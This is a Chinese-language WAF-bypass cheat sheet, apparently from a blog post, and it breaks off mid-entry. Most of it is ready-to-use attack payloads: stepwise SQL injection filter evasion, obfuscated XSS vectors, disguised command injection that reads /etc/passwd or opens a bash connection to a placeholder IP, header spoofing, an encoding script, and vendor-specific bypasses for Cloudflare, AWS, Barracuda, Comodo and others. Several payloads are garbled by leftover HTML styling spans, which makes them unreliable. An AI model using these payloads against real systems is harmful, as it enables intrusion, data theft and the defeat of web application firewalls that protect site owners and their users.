0X00 Fuzz/爆破
fuzz字典
1.Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2.Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3.Other Payloads 可能会被ban ip,小心为妙。
https://github.com/foospidy/payloads
0X01 正则绕过
Case: SQL 注入
Step 1:
- 过滤关键词: and, or, union
- 可能正则: preg_match('/(and|or|union)/i', $id)
- 被拦截的语句: union select user, password from users
- bypass语句: 1 || (select user from users where user_id = 1) = 'admin'
复制代码 Step 2:
- 过滤关键词: and, or, union, where
- 被拦截的语句: 1 || (select user from users where user_id = 1) = 'admin'
- bypass语句: 1 || (select user from users limit 1) = 'admin'
复制代码 Step 3:
- 过滤关键词: and, or, union, where, limit
- 被拦截的语句: 1 || (select user from users limit 1) = 'admin'
- bypass语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
复制代码 Step 4:
- 过滤关键词: and, or, union, where, limit, group by
- 被拦截的语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
- bypass语句: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
复制代码 Step 5:
- 过滤关键词: and, or, union, where, limit, group by, select
- 被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- bypass语句: 1 || 1 = 1 into outfile 'result.txt'
- bypass语句: 1 || substr(user,1,1) = 'a'
复制代码 Step 6:
- 过滤关键词: and, or, union, where, limit, group by, select, '
- 被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- bypass语句: 1 || user_id is not null
- bypass语句: 1 || substr(user,1,1) = 0x61
- bypass语句: 1 || substr(user,1,1) = unhex(61)
复制代码 Step 7:
- 过滤关键词: and, or, union, where, limit, group by, select, ', hex
- 被拦截的语句: 1 || substr(user,1,1) = unhex(61)
- bypass语句: 1 || substr(user,1,1) = lower(conv(11,10,36))
复制代码 Step 8:
- 过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr
- 被拦截的语句: 1 || substr(user,1,1) = lower(conv(11,10,36))
- bypass语句: 1 || lpad(user,7,1)
复制代码
Step 9:
- 过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr, white space
- 被拦截的语句: 1 || lpad(user,7,1)
- bypass语句: 1%0b||%0blpad(user,7,1)
复制代码
0X02 混淆/编码
1.大小写
- 标准: <script>alert()</script>
- Bypassed: <ScRipT>alert()</sCRipT>
- 标准: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
- Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
复制代码 2.URL编码
- 被阻断语句: <svG/x=">"/oNloaD=confirm()//
- Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
- 被阻断语句: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
- Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
复制代码 3.Unicode编码
- 标准: <marquee onstart=prompt()>
- 混淆: <marquee onstart=\u0070r\u06f\u006dpt()>
- 被阻断语句: /?redir=http://google.com
- Bypassed: /?redir=http://google。com (Unicode 替代)
- 被阻断语句: <marquee loop=1 onfinish=alert()>x
- Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode 替代)
- TIP: 查看这些说明 this and this reports on HackerOne. :)
复制代码 4.HTML实体编码
- <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">标准: "></span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(171, 178, 191); background: rgba(0, 0, 0, 0); display: inline; width: 192px;"><<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(224, 108, 117); background: rgba(0, 0, 0, 0); display: inline; width: 20px; text-decoration: none solid rgb(224, 108, 117); font-weight: 400; font-style: normal;">img</span> <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(209, 154, 102); background: rgba(0, 0, 0, 0); display: inline; width: 20px; text-decoration: none solid rgb(209, 154, 102); font-weight: 400; font-style: normal;">src</span>=<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 6px; text-decoration: none solid rgb(152, 195, 121); font-weight: 400; font-style: normal;">x</span> <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(209, 154, 102); background: rgba(0, 0, 0, 0); display: inline; width: 46px; text-decoration: none solid rgb(209, 154, 102); font-weight: 400; font-style: normal;">onerror</span>=<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 59px; text-decoration: none solid rgb(152, 195, 121); font-weight: 400; font-style: normal;">confirm()</span>></span>
- <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">Encoded: "><img src=x onerror=confirm()> (General form)</span>
- <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">Encoded: "><img src=x onerror=confirm()> (Numeric reference)</span>
复制代码 5.混合编码
- Sometimes, WAF rules often tend to filter out a specific type of encoding.
- This type of filters can be bypassed by mixed encoding payloads.
- Tabs and newlines further add to obfuscation.
复制代码 6.混淆
- <A HREF="h
- tt p://6 6.000146.0x7.147/">XSS</A>
复制代码 7. 双重URL编码
- 这个需要服务端多次解析了url编码
- 标准: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
- 混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
- 标准: <script>alert()</script>
- 混淆: %253Cscript%253Ealert()%253C%252Fscript%253E
复制代码 8. 通配符使用
- 用于linux命令语句注入,通过shell通配符绕过
- 标准: /bin/cat /etc/passwd
- 混淆: /???/??t /???/??ss??
- Used chars: / ? t s
- 标准: /bin/nc 127.0.0.1 1337
- 混淆: /???/n? 2130706433 1337
- Used chars: / ? n [0-9]
复制代码 9. 动态payload 生成
- 标准: <script>alert()</script>
- 混淆: <script>eval('al'+'er'+'t()')</script>
- 标准: /bin/cat /etc/passwd
- 混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wd
- Bash allows path concatenation for execution.
- 标准: <iframe/onload='this["src"]="javascript:alert()"';>
- 混淆: <iframe/onload='this["src"]="jav"+"as cr"+"ipt:al"+"er"+"t()"';>
复制代码 10. 垃圾字符
- Normal payloads get filtered out easily.
- Adding some junk chars helps avoid detection (specific cases only).
- They often help in confusing regex based firewalls.
- 标准: <script>alert()</script>
- 混淆: <script>+-+-1-+-+alert(1)</script>
- 标准: <BODY onload=alert()>
- 混淆: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
复制代码 NOTE: 上述语句可能会破坏正则的匹配,达到绕过。
11. 插入换行符
- 部分waf可能会对换行符没有匹配
- 标准: <iframe src=javascript:confirm(0)">
- 混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">
复制代码 12. 未定义变量
- bash 和 perl 执行脚本中加入未定义变量,干扰正则。
复制代码 TIP: 随便写个不存在的变量就好。$aaaa,$sdayuhjbsad,$dad2ed都可以。
- Level 1 Obfuscation: Normal
- 标准: /bin/cat /etc/passwd
- 混淆: /bin/cat$u /etc/passwd$u
- Level 2 Obfuscation: Postion Based
- 标准: /bin/cat /etc/passwd
- 混淆: $u/bin$u/cat$u $u/etc$u/passwd$u
- Level 3 Obfuscation: Random characters
- 标准: /bin/cat /etc/passwd
- 混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
- 一个精心制作的payload
- $sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
复制代码
13.Tab 键和换行符
- 大多数waf匹配的是空格不是Tab
- 标准: <IMG SRC="javascript:alert();">
- Bypassed: <IMG SRC=" javascript:alert();">
- 变形: <IMG SRC=" jav ascri pt:alert ();">
- 标准: http://test.com/test?id=1 union select 1,2,3
- 标准: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
- 标准: <iframe src=javascript:alert(1)></iframe>
- 混淆:
- <iframe src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>
复制代码 14. Token Breakers(翻译不了 看起来说的就是sql注入闭合)
- Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
复制代码- Case: Unknown Token for the Tokenizer
- Payload: ?id=‘-sqlite_version() UNION SELECT password FROM users --
- Case: Unknown Context for the Parser (Notice the uncontexted bracket)
- Payload 1: ?id=123);DROP TABLE users --
- Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --
复制代码 TIP: 更多payload可以看这里 cheat sheet.
15. 其他格式混淆
Case: IIS
- IIS6, 7.5, 8 and 10 (ASPX v4.x) 允许 IBM037 字符
- 可以发送编码后的参数名和值
复制代码 原始请求:
- POST /sample.aspx?id1=something HTTP/1.1
- HOST: victim.com
- Content-Type: application/x-www-form-urlencoded; charset=utf-8
- Content-Length: 41
- id2='union all select * from users--
复制代码 混淆请求 + URL Encoding:
- POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
- HOST: victim.com
- Content-Type: application/x-www-form-urlencoded; charset=ibm037
- Content-Length: 115
- %89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
复制代码 TIP: 可以使用 这个小脚本 来转化编码
- import urllib.parse, sys
- from argparse import ArgumentParser
- lackofart = '''
- OBFUSCATOR
- '''
- def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):
- result = ""
- equalSign = "="
- ampersand = "&"
- if '=' and '&' in params:
- if encodeEqualSign:
- equalSign = equalSign.encode(charset)
- if encodeAmpersand:
- ampersand = ampersand.encode(charset)
- params_list = params.split("&")
- for param_pair in params_list:
- param, value = param_pair.split("=")
- if urlDecodeInput:
- param = urllib.parse.unquote(param)
- value = urllib.parse.unquote(value)
- param = param.encode(charset)
- value = value.encode(charset)
- if urlEncodeOutput:
- param = urllib.parse.quote_plus(param)
- value = urllib.parse.quote_plus(value)
- if result:
- result += ampersand
- result += param + equalSign + value
- else:
- if urlDecodeInput:
- params = urllib.parse.unquote(params)
- result = params.encode(charset)
- if urlEncodeOutput:
- result = urllib.parse.quote_plus(result)
- return result
- def main():
- print(lackofart)
- parser = ArgumentParser('python3 obfu.py')
- parser._action_groups.pop()
- # A simple hack to have required arguments and optional arguments separately
- required = parser.add_argument_group('Required Arguments')
- optional = parser.add_argument_group('Optional Arguments')
- # Required Options
- required.add_argument('-s', '--str', help='String to obfuscate', dest='str')
- required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')
- # Optional Arguments (main stuff and necessary)
- optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
- optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
- args = parser.parse_args()
- if not len(sys.argv) > 1:
- parser.print_help()
- quit()
- print('Input: %s' % (args.str))
- print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))
- if __name__ == '__main__':
- main()
复制代码
0X04 HTTP 参数污染
手法
- 这种攻击方法基于服务器如何解释具有相同名称的参数
- 可能造成bypass的情况:
- 服务器使用最后接收到的参数,WAF只检查第一个参数
- 服务器将来自类似参数的值联合起来,WAF单独检查它们
复制代码
下面是相关服务器对参数解释的比较
环境 参数解析 示例
ASP/IIS用逗号连接par1=val1,val2
JSP, Servlet/Apache Tomcat第一个参数是结果par1=val1
ASP.NET/IIS用逗号连接par1=val1,val2
PHP/Zeus最后一个参数是结果par1=val2
PHP/Apache最后一个参数是结果par1=val2
JSP, Servlet/Jetty第一个参数是结果par1=val1
IBM Lotus Domino第一个参数是结果par1=val1
IBM HTTP Server最后一个参数是结果par1=val2
mod_perl, libapeq2/Apache第一个参数是结果par1=val1
Oracle Application Server 10G第一个参数是结果par1=val1
Perl CGI/Apache第一个参数是结果par1=val1
Python/Zope第一个参数是结果par1=val1
IceWarp返回一个列表[‘val1’,’val2’]
AXIS 2400最后一个参数是结果par1=val2
DBMan由两个波浪号连接起来par1=val1~~val2
mod-wsgi (Python)/Apache返回一个列表ARRAY(0x8b9058c)
0X05 浏览器的缺陷
Charset Bugs:
- 可以尝试 修改 charset header to 更高的 Unicode (eg. UTF-32)
- 当网站解码的时候,触发payload
复制代码 Example request:
- GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
- Host: site.com
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
- Accept-Charset:utf-32; q=0.5<
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
复制代码
当站点加载时,将其编码为我们设置的UTF-32编码,然后由于页面的输出编码为UTF-8,将其呈现为:"<script>alert (1) </ script> 从而触发xss 完整url编码后的 payload: - %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
复制代码 Null 空字节
空字节通常用作字符串终止符
- Payload 示例:
- <scri%00pt>alert(1);</scri%00pt>
- <scri\x00pt>alert(1);</scri%00pt>
- <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
- 标准: <a href="javascript:alert()">
- 混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
- 变形: <a 0x00 href="javascript:alert(1)">clickme</a>
复制代码 解析错误
- RFC 声明节点名不可以由空白起始
- 但是我们可以使用特殊字符 ` %, //, !, ?`, etc.
- 例子:
- <// style=x:expression\28write(1)\29> - Works upto IE7 (Source)
- <!--[if]><script>alert(1)</script --> - Works upto IE9 (Reference)
- <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference)
- <%div%20style=xss:expression(prompt(1))> - Works Upto IE7
复制代码
Unicode 分隔符
每个浏览器有不同的分隔分隔符
@Masato Kinugawafuzz 后发现如下
- IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3B
- Chrome: 0x09, 0x20, 0x28, 0x2C, 0x3B
- Safari: 0x2C, 0x3B
- FireFox: 0x09, 0x20, 0x28, 0x2C, 0x3B
- Opera: 0x09, 0x20, 0x2C, 0x3B
- Android: 0x09, 0x20, 0x28, 0x2C, 0x3B
复制代码- <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
复制代码 使用其他非典型等效语法结构替换
找的waf开发人员没有注意到的语句进行攻击
一些WAF开发人员忽略的常见关键字:
JavaScript functions:
Tag attributes:
onwheel ontoggle onfilterchange onbeforescriptexecute ondragstart onauxclick onpointerover srcdoc
SQL Operators
lpad
- lpad( string, padded_length, [ pad_string ] ) lpad函数从左边对字符串使用指定的字符进行填充
- lpad('tech', 7); 将返回' tech'
- lpad('tech', 2); 将返回'te'
- lpad('tech', 8, '0'); 将返回'0000tech'
- lpad('tech on the net', 15, 'z'); 将返回'tech on the net'
- lpad('tech on the net', 16, 'z'); 将返回'ztech on the net
复制代码 field
- FIELD(str,str1,str2,str3,...)
- 返回的索引(从1开始的位置)的str在str1,str2,STR3,...列表中。如果str没有找到,则返回0。
- +---------------------------------------------------------+
- | FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') |
- +---------------------------------------------------------+
- | 2 |
- +---------------------------------------------------------+
复制代码
bit_count 二进制数中包含1的个数。BIT_COUNT(10);因为10转成二进制是1010,所以该结果就是2 示例payloads: - Case: XSS
- <script>window['alert'](0)</script>
- <script>parent['alert'](1)</script>
- <script>self['alert'](2)</script>
- Case: SQLi
- SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
- 1%0b||%0bLPAD(USER,7,1)
- 可以使用许多替代原生JavaScript的方法:
复制代码
JSFuck JJEncode XChars.JS 滥用SSL/TLS密码:- 很多时候,服务器可以接收各种SSL/TLS密码和版本的连接。
- 初始化到waf不支持的版本
- 找出waf支持的密码(通常WAF供应商文档对此进行了讨论)。
- 找出服务器支持的密码(SSLScan这种工具可以帮助到你)。
- 找出服务器支持但waf不支持的
复制代码 Tool: abuse-ssl-bypass-waf
滥用 DNS 记录:
TIP: 一些在线资源 IP History 和 DNS Trails Tool: bypass-firewalls-by-DNS-history - bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall
复制代码
请求头欺骗让waf以为请求来自于内部网络,进而不对其进行过滤。 添加如下请求头 - X-Originating-IP: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Remote-Addr: 127.0.0.1
- X-Client-IP: 127.0.0.1
复制代码
Google Dorks Approach:应对已知WAF的绕过 搜索语法:Normal search:+<wafname> waf bypass Searching for specific version exploits:
"<wafname> <version>" (bypass|exploit) For specific type bypass exploits:
"<wafname>" +<bypass type> (bypass|exploit) On Exploit DB:
site:exploit-db.com +<wafname> bypass On 0Day Inject0r DB:
site:0day.today +<wafname> <type> (bypass|exploit) On Twitter:
site:twitter.com +<wafname> bypass On Pastebin
site:pastebin.com +<wafname> bypass
0X06 拓展Bypass姿势 Airlock Ergon- SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult
- %C0%80'+union+select+col1,col2,col3+from+table+--+
复制代码 AWS
SQLi Bypass by @enkaskal
- "; select * from TARGET_TABLE --
复制代码 XSS Bypass by @kmkz
- <script>eval(atob(decodeURIComponent("payload")))//
复制代码 BarracudaCross Site Scripting by @WAFNinja
- <body style="height:1000px" onwheel="alert(1)">
- <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
- <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
复制代码 XSS Bypass by @0xInfection
- <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
复制代码 Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort
Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort
Cerber (WordPress)Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son
- POST host.com HTTP/1.1
- Host: favoritewaf.com
- User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
- author=1
复制代码
Protected Admin Scripts Bypass by @ed0x21son
- http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
- http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar
复制代码 REST API Disable Bypass by @ed0x21son
- http://host/index.php/wp-json/wp/v2/users/
复制代码
Citrix NetScalerSQLi via HTTP Parameter Pollution (NS10.5) by @BGA Security
- <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
- <soapenv:Header/>
- <soapenv:Body>
- <string>’ union select current_user, 2#</string>
- </soapenv:Body>
- </soapenv:Envelope>
复制代码
generic_api_call.pl XSS by @NNPoster
- http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
复制代码 Cloudflare
HTML Injection by @spyerror
- <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
复制代码 XSS Bypass by @c0d3g33k
- <a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
复制代码 XSS Bypasses by @Bohdan Korzhynskyi
- <svg onload=prompt%26%230000000040document.domain)>
- <svg onload=prompt%26%23x000000028;document.domain)>
- xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
- 1'"><img/src/onerror=.1|alert``>
复制代码 XSS Bypass by @RakeshMane10
- <section data-mpa-preserve-tpl-color="t" data-mpa-template="t" class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; font-size: 17px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;"><pre style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; background: none;"><code class="" style="margin: 0px 0.15em; padding: 5.95px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; border-radius: 4px; font-size: 0.85em; background: rgb(40, 44, 52); color: rgb(171, 178, 191); display: block; overflow-x: auto; white-space: nowrap;"><svg/onload=&<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(92, 99, 112); background: rgba(0, 0, 0, 0); display: inline; width: 283px; text-decoration: none solid rgb(92, 99, 112); font-weight: 400; font-style: italic;">#97lert()//</span></code></pre></section>
复制代码 XSS Bypass by @ArbazKiraak
- <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(171, 178, 191); background: rgba(0, 0, 0, 0); display: inline; width: 824px;"><<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(224, 108, 117); background: rgba(0, 0, 0, 0); display: inline; width: 7px; text-decoration: none solid rgb(224, 108, 117); font-weight: 400; font-style: normal;">a</span> <span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(209, 154, 102); background: rgba(0, 0, 0, 0); display: inline; width: 26px; text-decoration: none solid rgb(209, 154, 102); font-weight: 400; font-style: normal;">href</span>=<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 765px; text-decoration: none solid rgb(152, 195, 121); font-weight: 400; font-style: normal;">"j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])"</span>></span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">X</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(171, 178, 191); background: rgba(0, 0, 0, 0); display: inline; width: 27px;"></<span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; color: rgb(224, 108, 117); background: rgba(0, 0, 0, 0); display: inline; width: 7px; text-decoration: none solid rgb(224, 108, 117); font-weight: 400; font-style: normal;">a</span>></span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 14.45px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">`</span>
复制代码 XSS Bypass by @Ahmet Ümit
- <span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;"><--</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(152, 195, 121); color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 72px;">`<img/src=`</span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;"> onerror=confirm</span><span class="" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important; font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration: none solid rgb(152, 195, 121); color: rgb(152, 195, 121); background: rgba(0, 0, 0, 0); display: inline; width: 13px;">``</span><span style="color: rgb(171, 178, 191); font-family: monospace; font-size: 11.05px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: 0.544px; orphans: 2; text-align: justify; text-indent: 0px; text-transform: none; white-space: nowrap; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(40, 44, 52); text-decoration-style: initial; text-decoration-color: initial; display: inline !important; float: none;">> --!></span>
复制代码 XSS Bypass by @Shiva Krishna
XSS Bypass by @Brute Logic
XSS Bypass by @RenwaX23 (Chrome only)
- <j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
复制代码 RCE Payload Detection Bypass by @theMiddle
- cat$u+/etc$u/passwd$u
- /bin$u/bash$u <ip> <port>
- ";cat+/etc/passwd+#
复制代码 Comodo
XSS Bypass by @0xInfection
- <input/oninput='new Function`confir\u006d\`0\``'>
- <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
复制代码 SQLi by @WAFNinja
- 0 union/**/select 1,version(),@@datadir
复制代码
DotDefenderFirewall disable by (v5.0) by @hyp3rlinx - PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
- <enabled>false</enabled>
复制代码 Remote Command Execution (v3.8-5) by @John Dos
- POST /dotDefender/index.cgi HTTP/1.1
- Host: 172.16.159.132
